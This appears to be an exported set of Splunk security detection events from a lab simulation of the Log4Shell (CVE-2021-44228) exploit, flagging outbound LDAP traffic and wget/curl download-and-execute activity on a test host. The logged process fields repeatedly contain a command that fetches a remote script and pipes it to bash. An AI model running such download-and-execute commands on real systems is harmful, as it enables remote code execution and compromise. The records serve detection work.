annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-20T00:21:41", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:110", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642639761, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="T1190", annotations._all="DE.AE", annotations._all="CVE-2021-44228", annotations._all="CIS 13", annotations._all="Stage:Initial Access", annotations._all="Source:Endpoint", annotations._all="T1059", annotations._all="Command and Control", annotations._all="PR.PT", annotations._all="CIS 12", annotations._all="Log4Shell CVE-2021-44228", annotations._all="DE.CM", annotations._all="PR.DS", annotations._all="Actions on Objectives", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", 
annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-20T00:21:41", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:114", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. 
This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642639716, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Ingress Tool Transfer", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget 
on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642639716, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Ingress Tool Transfer", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", 
savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642639716, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Ingress Tool Transfer", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it 
with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642639716, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Ingress Tool Transfer", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was 
identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642639716, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Ingress Tool Transfer", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", 
process_id="7872", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642639716, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Ingress Tool Transfer", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", 
parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642639716, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Ingress Tool Transfer", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", 
info_min_time="0.000", lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642639716, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Ingress Tool Transfer", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", 
count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642639716, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Ingress Tool Transfer", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", 
annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642639716, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Ingress Tool Transfer", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", 
annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. 
This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642639716, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Ingress Tool Transfer", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", 
risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642639716, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Ingress Tool Transfer", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified 
on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642639716, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Ingress Tool Transfer", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO 
- http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642639716, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Ingress Tool Transfer", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", 
info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642639716, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Ingress Tool Transfer", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", 
